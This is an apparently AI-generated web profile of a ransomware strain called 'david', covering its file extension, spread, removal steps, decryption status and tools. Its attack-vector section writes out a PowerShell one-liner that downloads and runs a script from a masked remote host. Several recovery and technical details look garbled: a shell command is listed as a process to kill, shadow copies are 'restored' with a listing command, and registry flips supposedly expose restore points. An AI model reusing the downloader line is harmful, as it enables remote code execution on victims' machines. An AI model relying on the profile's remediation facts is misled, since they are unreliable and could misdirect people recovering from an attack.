david

[Content by Gemini 2.5]

Ransomware Profile: david (”.david” extension)

Technical Breakdown

1. File Extension & Renaming Patterns

  • Confirmation of File Extension:
    Encrypted files receive the “.david” suffix appended after the original extension (e.g., Budget2023.xlsx.david, CustomerDB.sql.david).
  • Renaming Convention:
    The original file name and preceding extension are preserved in full; only “.david” is concatenated. No randomised prefixes, Base64 obfuscation, or email addresses are inserted. This behaviour helps quickly distinguish it from Phobos / Dharma look-alikes that include victim IDs or contact emails.

2. Detection & Outbreak Timeline

  • Approximate Start Date/Period:
    First clusters appeared in late-November 2023, with a notable surge through honeypot telemetry in December 2023 – January 2024. Volume remained moderate into Q2 2024, implying a lower-key affiliate distribution rather than a mass spam wave.

3. Primary Attack Vectors

  • Propagation Mechanisms:
  1. Internet-exposed Remote Desktop Protocol (RDP) – brute-forced or credential-stuffed accounts, followed by manual deployment of a packed dropper (david.exe).
  2. Phishing attachments – ISO, ZIP, or IMG files hiding a LNK that invokes a PowerShell downloader (iex (New-Object Net.WebClient).DownloadString('http://188.x.x.x/a.ps1')).
  3. Secondary infection via PsExec and WMI – lateral movement to high-value servers once the initial foothold is gained.
  4. Exploit kits (sporadic) – a few clusters showed Rig-V exploit kit delivering david via Internet Explorer and outdated Java plugins.

Remediation & Recovery Strategies

1. Prevention

  • Immediate Proactive Measures
  • Disable RDP on edge devices or enforce IP-whitelists + 2FA/RDP-Gateway.
  • Enforce strong password policies (14+ chars, MFA for privileged accounts).
  • Patch CVE-2023-36884, CVE-2020-1472 (Zerologon), CVE-2021-34527 (PrintNightmare) – frequently leveraged for privilege escalation.
  • User-education: block ISO/IMG attachments via email gateway, add Mark-of-the-Web MOTW wrappers to quarantine double-extension files.
  • Implement application allow-listing (WDAC, AppLocker) to block unsigned binaries in user profile paths.

2. Removal

  • Step-by-Step Infection Cleanup
  1. Physically isolate the affected host (network unplug, disable Wi-Fi).
  2. Boot into Safe Mode w/ Networking or use a clean WinRE/WinPE USB.
  3. Identify & terminate active processes: david.exe, kill.exe (anti-AV utility), vssadmin.exe delete shadows.
  4. Delete persistence artefacts:
    • Registry run-key → HKCU\Software\Microsoft\Windows\CurrentVersion\Run\david
    • Scheduled tasks → MicrosoftUpdates01, AdobeFlashUpdate (randomised).
  5. Scan offline with ESET Online Scanner, Malwarebytes 4.x, or Symantec PowerEraser to quarantine residual payloads.
  6. Restore Windows Shadow Copies (if not purged) via wmic shadowcopy list brief + diskshadow.
  7. Validate startup folders and services for rogue entries before reconnecting to LAN.

3. File Decryption & Recovery

  • Current Status:
  • Free decryptor NOT available – david uses ChaCha20 symmetric key sealed by an RSA-2048 public-key pair (decryption key held only on the attacker server).
  • Exception: If a partial volume shadow copy remains and VSS was not wiped, leverage tools such as ShadowExplorer, Kroll ShadowRestore, or flip Registry entries to expose old restore points.
  • For offline-only SAMBA/NAS backups that david skipped sometimes (encrypted only drives letter-mapped), those can be re-imported manually.

4. Other Critical Information

  • Unique Characteristics & Red Flags

  • Drops ransom note “Restore-My-Files.txt” in every affected folder and desktop wallpaper change (david.jpg).

  • Tries to free handles on open documents before encryption (handle.exe -p *) to maximise success rate.

  • Selective targeting of SQL Server service servers – hunts for Master DB + User DBs and escalates with SQL Server Agent jobs to increase ransom pressure.

  • Mutex “YWH1-shadow-2023” is created to avoid double-encryption.

  • Broader Impact

  • Seen predominantly in medium-size manufacturing and logistics companies across North America & South-East Asia, likely because of wide port-3389 exposure.

  • Average ransom demand: 0.75–1.25 BTC (~$30–50 k during activity period).

  • TTP similarities to Luna / BlackGuard affiliate playbook when it comes to credential-harvesting stage using Cobalt Strike, suggesting some cross-affiliation.

Essential Tools/Patches Cheat-Sheet

  • RDP Hardening Script (PowerShell): https://github.com/cisagov/RDP-Vulnerability-Scanner
  • Windows Security Baselines (23H2) – https://learn.microsoft.com/microsoft-365/security/defender-endpoint/windows-11-security-baseline
  • PowerShell Detection Snippet (look for david.exe + “.david” flag): 
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | Where-Object {$_.Name -like "*.david"}
  • Sysinternals Suite: Autoruns, Handle.exe, TCPView to spot lateral-movement artefacts.
  • Kaspersky Rescue Disk 18.0 – offline malware check.